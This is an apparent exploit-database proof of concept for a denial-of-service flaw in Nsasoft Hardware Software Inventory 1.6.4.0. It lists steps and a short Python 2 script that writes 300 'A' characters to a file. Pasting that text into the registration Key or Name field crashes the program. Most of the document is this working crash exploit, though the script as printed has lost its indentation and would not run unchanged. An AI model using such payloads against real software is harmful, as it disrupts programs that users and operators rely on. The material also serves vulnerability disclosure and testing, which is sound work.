Nsasoft Hardware Software Inventory version 1.6.4.0 suffers from a denial of service vulnerability.
aae48b3d926d2f75fcb3e74d0827eb85# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10
# Steps:
1- Run the python script. (payload.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'.
4- Register -> Enter Registeration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!"